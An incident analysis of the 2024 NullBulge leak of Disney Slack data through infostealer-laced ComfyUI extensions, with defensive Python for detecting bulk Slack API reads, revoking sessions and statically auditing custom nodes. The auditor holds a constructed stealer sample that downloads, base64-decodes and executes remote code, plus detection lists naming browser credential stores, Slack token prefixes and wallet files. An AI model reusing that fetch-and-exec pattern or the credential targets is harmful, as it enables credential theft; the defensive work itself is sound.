Decipher File · Pre-July 2024 compromise, July 12 public disclosure
Disney Slack Leak (Jul 2024): NullBulge Exfiltrated 1TB via Crypto-Stealer Malware on an Employee's PC
On July 12, 2024 a self-described hacktivist group calling itself NullBulge published approximately 1.1 terabytes of internal Disney Slack data covering thousands of channels, including conversations on theme park operations, Disney+ projects, advertising deals, and unreleased film projects. NullBulge claimed the access came through a Disney employee whose personal computer was compromised by credential- and cryptocurrency-wallet-stealing malware distributed through the ComfyUI generative-AI extension community. The Wall Street Journal confirmed the scope on July 15, 2024 and Disney confirmed the incident in public statements. The implicated employee was terminated and sued Disney in August 2024 alleging wrongful termination. The incident produced one of the largest single-corporation Slack data disclosures in the platform's history.
Incident summary
On July 12, 2024 a self-described hacktivist group calling itself NullBulge published approximately 1.1 terabytes of internal Disney Slack data on the open and dark web. The published data covered thousands of Disney Slack channels and direct messages from a window spanning multiple years, including conversations on theme park operations, Disney+ streaming product roadmap, advertising deal negotiations, unreleased film and television projects, and internal HR and legal discussions. The Wall Street Journal confirmed the scope and contents in a July 15, 2024 report, and Disney issued a public statement confirming an incident investigation.
NullBulge stated publicly that the initial access vector was a Disney employee whose personal computer had been compromised by credential-stealing malware delivered through the ComfyUI generative-AI extension community. ComfyUI is a node-based interface for Stable Diffusion image generation that supports a wide library of community-contributed extensions. NullBulge claimed that compromised ComfyUI extensions on personal computers delivered a payload that exfiltrated browser-stored credentials and cryptocurrency wallet data. The credentials extracted included Slack workspace authentication tokens, which gave the actor authenticated Slack API access as that user, with no password or MFA prompt, for as long as the session remained valid.
Disney terminated the implicated employee following its internal investigation. The employee filed a wrongful termination lawsuit in August 2024 alleging that the personal-computer compromise occurred outside of work activity and that the Slack credentials had been used on the personal device against Disney's IT policies. The lawsuit, filed in Los Angeles, opened public-record discussion of how corporate Slack credentials had ended up on a personal computer in the first place, and whether Disney's identity and endpoint controls had created the conditions that permitted the compromise. The case remained in active litigation through 2024 and 2025.
Attack technique
The technique chain combined a generative-AI supply chain vector with conventional credential theft and Slack API abuse. The ComfyUI extension community in mid-2024 was largely uncurated and many extensions were distributed via GitHub repositories and Reddit posts with limited code review. Per NullBulge's public statements and Bloomberg and Krebs on Security reporting, certain ComfyUI custom nodes contained Python code that, on installation, downloaded a payload that scanned browser local storage and extension stores for Slack workspace authentication tokens, cryptocurrency wallet seed phrases, and other credential material. The payload exfiltrated the harvested credentials to attacker-controlled cloud storage.
Slack workspace authentication tokens are operationally distinct from a Slack password. Once Slack issues a token to a user's browser or desktop client, it persists across restarts and authenticates Web API calls without re-prompting for credentials or MFA, because MFA was satisfied when the session was created. A stolen token therefore gives an actor full-fidelity access to that user's workspace at the API level until the session is signed out or revoked, which in practice can be weeks or longer. Slack token theft has become a standard capability in the infostealer market alongside browser session cookie theft; the 2024 Snowflake customer breaches, which relied on infostealer-harvested credentials, fall into the same broad category of initial access.
Post-compromise Slack data extraction at the scale of the Disney leak (approximately 1.1 terabytes) is not practical through interactive Slack use. The exfiltration pattern required automated Slack API calls or use of Slack's data export functionality. Slack's workspace export requires owner or administrator privileges, which the affected employee did not necessarily have, but channel-by-channel and direct-message-by-direct-message enumeration through read methods such as conversations.list, conversations.history and files.list at the user's own privilege level can pull everything that user could read. Judging by the scope of the published data, the affected user had read access across a large number of channels, which is the realistic default in large Slack workspaces where most channels are open to every member.
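The volume pattern described above is detectable at the network edge if you have URL-level visibility into outbound HTTPS (a TLS-inspecting proxy or a CASB). The following is an added example, not code from the original page and not Slack's own tooling: it reads a constructed proxy log in a "timestamp client method url" format, counts read-side Slack Web API calls per client per hour, and flags clients whose call volume or channel breadth is far beyond interactive use. The log format, the sample lines, the client addresses and the thresholds are assumptions for illustration.

```python
"""Detect bulk Slack channel enumeration in outbound proxy/CASB logs.

Added example; not from the original page and not Slack's own tooling. Assumes
URL-level visibility into outbound HTTPS and a constructed log format of
"timestamp client method url" per line. Thresholds and the sample log are
illustrative, not tuned baselines.
"""
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Read-side Web API methods a collector must call repeatedly to walk a workspace.
# Ordinary clients call them too, but not hundreds of times an hour across many channels.
ENUMERATION_METHODS = {
    "conversations.list", "conversations.history", "conversations.replies",
    "users.list", "files.list", "search.messages",
}

def _line(ts, client, url):
    return f"{ts} {client} GET {url}"

# Constructed sample: 10.0.0.5 behaves like a person; 10.0.0.9 walks
# conversations.history with pagination cursors across 300 channels in a few minutes.
SAMPLE_LOG = "\n".join(
    [
        _line("2024-07-01T09:00:00Z", "10.0.0.5", "https://slack.com/api/conversations.history?channel=C01"),
        _line("2024-07-01T09:05:00Z", "10.0.0.5", "https://slack.com/api/chat.postMessage"),
        _line("2024-07-01T09:20:00Z", "10.0.0.5", "https://slack.com/api/conversations.history?channel=C02"),
        _line("2024-07-01T09:21:00Z", "10.0.0.5", "https://example.com/"),
    ]
    + [
        _line(f"2024-07-01T09:{i // 60:02d}:{i % 60:02d}Z", "10.0.0.9",
              f"https://slack.com/api/conversations.history?channel=C{i:03d}&cursor=dXNlcjp{i}")
        for i in range(300)
    ]
)

def parse_line(line):
    """Return (timestamp, client, slack_method, channel) or None for non-Slack-API lines."""
    try:
        ts, client, _method, url = line.split()
    except ValueError:
        return None
    u = urlsplit(url)
    if u.netloc != "slack.com" or not u.path.startswith("/api/"):
        return None
    channel = parse_qs(u.query).get("channel", [None])[0]
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, u.path[len("/api/"):], channel

def find_bulk_readers(log_text, max_calls_per_hour=100, max_channels_per_hour=25):
    """Flag clients whose enumeration-call volume or channel breadth per hour is abnormal."""
    calls = defaultdict(int)        # (client, hour) -> enumeration calls
    channels = defaultdict(set)     # (client, hour) -> distinct channels read
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, client, method, channel = parsed
        if method not in ENUMERATION_METHODS:
            continue
        key = (client, ts.strftime("%Y-%m-%dT%H"))
        calls[key] += 1
        if channel:
            channels[key].add(channel)
    alerts = []
    for (client, hour), n in calls.items():
        breadth = len(channels[(client, hour)])
        if n >= max_calls_per_hour or breadth >= max_channels_per_hour:
            alerts.append({"client": client, "hour": hour, "calls": n, "channels": breadth})
    return sorted(alerts, key=lambda a: (a["client"], a["hour"]))

if __name__ == "__main__":
    for alert in find_bulk_readers(SAMPLE_LOG):
        print(alert)
```

Two caveats when adapting this: Slack clients usually send Web API calls as POST with form bodies, so channel IDs are only visible if your proxy logs request bodies (the constructed sample uses GET query strings to keep the channel visible); without body visibility, drop the channel-breadth check and alert on call volume alone. And set the thresholds from a baseline of your own users' hourly call counts rather than the illustrative numbers above.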
Impact and consequences
Business impact extended across multiple Disney functions. The leaked Slack conversations included unreleased film project discussions, theme park ride and attraction development plans, advertising deal terms with major brands, Disney+ subscription pricing and content licensing strategy, HR discussions about specific named employees, and internal legal team conversations about active matters. Disney's response included external counsel engagement, business-unit-specific damage assessments, and public statements emphasizing that financial systems and customer data were not affected.
The financial impact has not been publicly disclosed. Disney did not record a specific incident cost in its fiscal 2024 SEC filings. The downstream impact on commercial relationships, including advertisers and content licensing partners whose deal terms were disclosed, has been described in trade press as a factor in specific deal renegotiations, but no consolidated figure exists in public filings. The reputational impact on Disney's internal-communications confidentiality was real but did not produce measurable customer-side impact on theme park attendance, Disney+ subscriptions, or box office.
The generative-AI supply chain vector produced industry-wide attention. The ComfyUI extension compromise, while technically narrow, exposed a broader pattern: organizations whose employees use generative-AI tools and extensions on personal devices for work-adjacent purposes are exposed to credential-theft vectors that conventional corporate endpoint controls cannot reach. Through late 2024 and into 2025, multiple enterprises tightened policies on generative-AI tool use on personal devices, on credential storage in personal browsers, and on the use of personal devices for any work-related cloud access.
The wrongful-termination lawsuit produced a separate legal precedent conversation. The employee's case argued that Disney's policies did not adequately distinguish between work-device and personal-device compromise, and that Disney's response of termination over consultation and remediation was inappropriate for an employee who was himself a victim of malware. The case raised broader questions about corporate identity and endpoint policy in an era where employees routinely use personal devices for SaaS access, and where the boundary between work-device compromise and personal-device compromise is not always clear-cut. The litigation outcome may shape policy precedent in this area.
Indicators of Compromise
Specific artifacts and behaviors defenders should hunt for. These are behavioral indicators rather than atomic ones; no file hashes, domains or IP addresses for the payload are reproduced here, so cross-reference these against your existing detection rules before acting on them.
- ComfyUI custom extension downloads from untrusted sources delivering credential-stealing payloads, per NullBulge's July 2024 public claims
- Browser-stored Slack workspace credentials extracted from compromised endpoints, consistent with ATT&CK T1555.003 (Credentials from Web Browsers)
- Outbound Slack API access at a volume or channel breadth inconsistent with normal employee Slack usage
- Bulk Slack channel and direct message exports via Slack's data export functionality or third-party connector tools
- NullBulge data dump posts referencing approximately 1.1 terabytes of Disney internal data on the open and dark web in mid-July 2024
- Cryptocurrency wallet-stealing malware indicators tied to the ComfyUI distribution chain, as documented in security industry reporting from July to August 2024
Lessons for defenders
Slack workspace tokens are credential material with the same sensitivity as passwords. They authenticate API access for weeks or longer without re-prompting, and they do not trigger MFA again because MFA was satisfied when the session was created. Treat Slack tokens, browser session cookies, and equivalent SaaS authentication artifacts as credentials in your incident response playbook. The standard credential rotation step after an employee endpoint compromise should include forced Slack session revocation (a password reset alone does not necessarily invalidate an already-issued token), forced session termination across the enterprise SaaS portfolio, and an MFA challenge on next sign-in.
Personal-device SaaS access is the structural risk. The Disney employee's personal computer was the initial compromise point because Slack workspace credentials existed in browser storage on that personal device. Build identity and access policies that restrict SaaS workspace access to managed corporate devices where the device posture can be assessed before token issuance. Microsoft Entra Conditional Access, Okta Device Trust, Google Context-Aware Access, and equivalent identity-platform device-trust controls operationalize this restriction. The cost is friction for legitimate users who want to access work SaaS from personal devices. The benefit is closing the vector that hit Disney; note that device trust does not stop the same infostealer running on a managed device, so it belongs alongside EDR and browser credential-store hardening rather than in place of them.
Generative-AI tool supply chain risk is not theoretical. The ComfyUI extension community in mid-2024 was uncurated and shipped Python code that ran with the full privileges of the local user on installation. The same risk pattern applies to ChatGPT plugins, Cursor extensions, VS Code extensions, browser extensions, and any other community-contributed code that runs in trusted contexts on developer or knowledge-worker endpoints. Audit your endpoint policies for generative-AI tool use. The realistic policy is to restrict generative-AI tools to vetted corporate-provided versions where the supply chain can be controlled.
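The forced-revocation step is a concrete API call. Below is an added example, not Slack's own tooling and not code from the original page, that resets every web and mobile session for a list of compromised users through Slack's Enterprise Grid admin method admin.users.session.reset (which requires an org-level token with the admin.users:write scope). The HTTP transport is injectable so the retry logic can be exercised offline; the fake transport, the user IDs and the token string are constructed for the demo.

```python
"""Force-reset Slack sessions for users whose endpoint was compromised.

Added example, not Slack's own tooling. Calls the Enterprise Grid admin method
admin.users.session.reset, which invalidates every web and mobile session for a
user, so a harvested token stops working regardless of password state. Requires
an org-level token with the admin.users:write scope. The transport is injectable;
the fake transport and the user IDs below are constructed.
"""
import json
import time
import urllib.error
import urllib.parse
import urllib.request

SLACK_API = "https://slack.com/api/"

def slack_post(token, method, params):
    """Real transport: form-encoded POST with a bearer token; HTTP 429 becomes a ratelimited reply."""
    req = urllib.request.Request(
        SLACK_API + method,
        data=urllib.parse.urlencode(params).encode(),
        headers={"Authorization": f"Bearer {token}"},
    )
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as e:
        if e.code == 429:
            return {"ok": False, "error": "ratelimited",
                    "retry_after": int(e.headers.get("Retry-After", "1"))}
        raise

def reset_sessions(user_ids, token, post=slack_post, sleep=time.sleep, max_attempts=3):
    """Reset all sessions for each user; returns {user_id: 'reset' | 'failed: <error>'}."""
    results = {}
    for uid in user_ids:
        for attempt in range(max_attempts):
            # No mobile_only/web_only flag on purpose: a stolen token may be replayed
            # from any surface, so every session the user holds has to go.
            resp = post(token, "admin.users.session.reset", {"user_id": uid})
            if resp.get("ok"):
                results[uid] = "reset"
                break
            if resp.get("error") == "ratelimited" and attempt < max_attempts - 1:
                sleep(resp.get("retry_after", 1))
                continue
            results[uid] = f"failed: {resp.get('error', 'unknown')}"
            break
    return results

def fake_transport(fail_users=(), ratelimit_first=False):
    """Offline stand-in for slack_post that records calls (constructed for the demo)."""
    state = {"calls": [], "limited": ratelimit_first}
    def post(token, method, params):
        state["calls"].append((method, params["user_id"]))
        if state["limited"]:
            state["limited"] = False
            return {"ok": False, "error": "ratelimited", "retry_after": 0}
        if params["user_id"] in fail_users:
            return {"ok": False, "error": "user_not_found"}
        return {"ok": True}
    post.state = state
    return post

if __name__ == "__main__":
    demo = fake_transport(fail_users={"U0000000X"}, ratelimit_first=True)
    print(reset_sessions(["U0123ABCD", "U0000000X"], "xoxp-EXAMPLE-TOKEN",
                         post=demo, sleep=lambda s: None))
```

Run it against the real API by calling reset_sessions with the default transport and an admin token from a secret store; keep the per-user results, since an incident record needs to show which sessions were actually invalidated and when.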
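Because a ComfyUI custom node is ordinary Python that ComfyUI imports at startup, the minimum vetting step is to read the package without importing it. The following is an added example, not ComfyUI's or ComfyUI-Manager's own code: it parses every .py file in a node package with the standard library ast module and reports the pattern described in this article (network fetch plus decode plus exec, or string literals that point at browser credential stores, Slack token prefixes or wallet files). The indicator lists, the verdict rules and the two sample packages it writes to a temp directory are this example's own constructions, not a published signature set.

```python
"""Static pre-install audit for ComfyUI custom-node packages.

Added example, not ComfyUI's or ComfyUI-Manager's own code. Parses every .py
file with `ast` and never imports the package (importing is what would run an
installer). Indicator lists, verdict rules and sample packages are constructed.
"""
import ast
import tempfile
from pathlib import Path

NETWORK_MODULES = {"urllib", "urllib.request", "requests", "socket", "http.client", "httpx"}
DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__", "importlib.import_module"}
SHELL_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.Popen",
               "subprocess.call", "subprocess.check_output"}
DECODERS = {"base64.b64decode", "base64.b85decode", "zlib.decompress", "marshal.loads"}
# Literal fragments a stealer needs in order to locate credential material on disk.
CREDENTIAL_STORE_HINTS = [
    "login data", "local state", "web data", "leveldb", "local storage",  # Chromium profile
    "logins.json", "key4.db",                                             # Firefox profile
    "xoxc-", "xoxd-",                                                     # Slack token prefixes
    "wallet.dat", "exodus", "metamask", "electrum", "seed phrase",         # wallets
]

def _dotted_name(node):
    """'a.b.c' for a Name/Attribute chain such as subprocess.run, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def audit_source(source, filename="<node>"):
    """Return the set of risk tags found in one Python source string."""
    try:
        tree = ast.parse(source, filename)
    except SyntaxError:
        return {"unparseable"}          # cannot vouch for it; send for manual review
    tags = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            if any(alias.name in NETWORK_MODULES for alias in node.names):
                tags.add("network")
        elif isinstance(node, ast.ImportFrom):
            if node.module in NETWORK_MODULES:
                tags.add("network")
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in DYNAMIC_EXEC:
                tags.add("dynamic-exec")
            elif name in SHELL_CALLS:
                tags.add("shell")
            elif name in DECODERS:
                tags.add("decoder")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(h in node.value.lower() for h in CREDENTIAL_STORE_HINTS):
                tags.add("credential-store-path")
    return tags

def audit_package(root):
    """Audit every .py file under a node package; return (verdict, {file: tags})."""
    report = {}
    for path in sorted(Path(root).rglob("*.py")):
        tags = audit_source(path.read_text(encoding="utf-8", errors="replace"), str(path))
        if tags:
            report[str(path.relative_to(root))] = sorted(tags)
    found = {tag for tags in report.values() for tag in tags}
    if "network" in found and found & {"dynamic-exec", "shell", "decoder"}:
        return "block: fetches and executes code", report
    if "credential-store-path" in found:
        return "block: references credential stores", report
    if found:
        return "review", report
    return "ok", report

BENIGN_NODE = '''
import torch
class UpscaleNode:
    def run(self, image):
        return image * 2
NODE_CLASS_MAPPINGS = {"UpscaleNode": UpscaleNode}
'''
# Constructed to resemble the delivery pattern described above; not real malware.
STEALER_NODE = '''
import base64, urllib.request
NODE_CLASS_MAPPINGS = {}
def _init():
    blob = urllib.request.urlopen("http://example.invalid/p").read()
    exec(base64.b64decode(blob))
_init()
'''

def build_sample_packages():
    """Write the two constructed packages into a temp dir and return its path."""
    root = Path(tempfile.mkdtemp(prefix="comfy_nodes_"))
    for name, body in (("good_node", BENIGN_NODE), ("bad_node", STEALER_NODE)):
        (root / name).mkdir()
        (root / name / "__init__.py").write_text(body, encoding="utf-8")
    return root

if __name__ == "__main__":
    root = build_sample_packages()
    for pkg in sorted(p for p in root.iterdir() if p.is_dir()):
        print(pkg.name, audit_package(pkg))
```

This catches the obvious shape and nothing more: aliased imports (from subprocess import run), string concatenation that assembles a path at runtime, and payloads hidden in requirements.txt, install scripts or pickled model files all slip past a literal-matching pass. Treat a clean result as "nothing obvious", and keep the policy of installing community nodes only from vetted sources and only on machines that hold no corporate credentials.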
Insider-vs-victim attribution in employee endpoint compromises is operationally important. The Disney wrongful-termination case turned on whether the employee was an insider participant in the compromise or a victim of credential theft outside the workplace. Forensic clarity on this distinction depends on having endpoint telemetry, browser activity logs, and identity audit data that can be reconstructed after the fact. Build that telemetry capability before the first incident. The cost of inadequate forensic clarity is uncertain employment decisions and downstream litigation.
Frequently asked questions
What happened in the Disney Slack leak?
On July 12, 2024 a self-described hacktivist group calling itself NullBulge published approximately 1.1 terabytes of internal Disney Slack data on the open and dark web. The data covered thousands of Slack channels and direct messages including conversations on theme parks, Disney+, advertising, and unreleased film projects. The Wall Street Journal confirmed the scope on July 15, 2024 and Disney confirmed the incident in public statements. NullBulge claimed initial access came through a Disney employee whose computer was compromised by credential-stealing malware delivered via the ComfyUI generative-AI extension community.
Who is NullBulge?
NullBulge is a self-described hacktivist group that claimed responsibility for the Disney Slack leak in July 2024. The group's stated motivations included opposition to AI training on copyrighted material and criticism of large entertainment companies. NullBulge is operationally distinct from the Russian-language ransomware-as-a-service underground and from nation-state APT groups. Public attribution beyond the group's self-identification has not been independently confirmed by major incident response firms or government agencies.
How did NullBulge get into Disney's Slack?
Per NullBulge's public statements and Bloomberg and Krebs on Security reporting, the initial access vector was credential-stealing malware delivered through compromised custom extensions in the ComfyUI generative-AI community. The malware exfiltrated browser-stored credentials including Slack workspace authentication tokens from a Disney employee's personal computer. The stolen Slack tokens gave the actor authenticated API access to the affected user's Slack workspace for as long as the tokens remained valid. The exfiltration of approximately 1.1 terabytes of Slack data required automated API enumeration at the user's privilege level.
What data was leaked in the Disney Slack incident?
Per WSJ's July 15, 2024 reporting, the leaked data covered thousands of Disney Slack channels and direct messages from a multi-year window. Contents included conversations on theme park operations, Disney+ streaming product roadmap, advertising deal negotiations, unreleased film and television projects, internal HR and legal discussions, and other internal business material. Disney has stated publicly that financial systems and customer data were not affected. The total volume was approximately 1.1 terabytes.
What happened to the Disney employee whose computer was compromised?
Disney terminated the implicated employee following its internal investigation. The employee filed a wrongful termination lawsuit in Los Angeles in August 2024 alleging that the personal-computer compromise occurred outside of work activity, that he was himself a victim of credential-stealing malware, and that Disney's policies did not adequately distinguish between work-device and personal-device compromise. The case remained in active litigation through 2024 and 2025 and may shape legal precedent on corporate identity and endpoint policy.
What is ComfyUI and how was it involved?
ComfyUI is a node-based open-source interface for Stable Diffusion image generation with a community-contributed library of custom node extensions. Per NullBulge's public claims and Bloomberg and Krebs on Security technical reporting, certain ComfyUI custom node extensions distributed via GitHub and other community channels contained Python code that, on installation, downloaded payloads that scanned for browser-stored credentials and cryptocurrency wallet data. The ComfyUI extension community in mid-2024 was uncurated, which permitted this distribution pattern.
What can other organizations learn from the Disney incident?
Slack workspace tokens are credentials and require the same protection as passwords, including forced revocation in incident response. Personal-device SaaS access is a structural risk, and identity policies should restrict SaaS workspace access to managed corporate devices where device posture can be assessed. Generative-AI tool supply chain risk is not theoretical, and endpoint policies need to restrict generative-AI tools to vetted corporate-provided versions. Insider-vs-victim attribution in employee endpoint compromises requires endpoint telemetry and forensic data that must exist before the first incident.
Sources
- Wall Street Journal: Disney Internal Communications Hacked · WSJ's July 15, 2024 reporting on the scope and contents of the leaked Slack data
- Disney Company Statement on Slack Incident · Disney's public confirmation of the incident and ongoing investigation
- Reuters: Disney probes leak of internal communications · Reuters reporting on Disney's investigation and NullBulge's stated motivations
- Disney Employee Wrongful Termination Lawsuit (August 2024) · Court filing alleging Disney terminated the implicated employee inappropriately
- Bloomberg: Hackers Tied to Generative AI Tool Used to Hit Disney · Bloomberg reporting on the ComfyUI supply chain vector and NullBulge group profile
- Krebs on Security: Disney Slack Leak and the AI Extension Supply Chain · Krebs on Security technical analysis of the ComfyUI extension delivery vector
DecipherU is not affiliated with, endorsed by, or sponsored by any company listed in this directory. Information compiled from publicly available sources for educational purposes.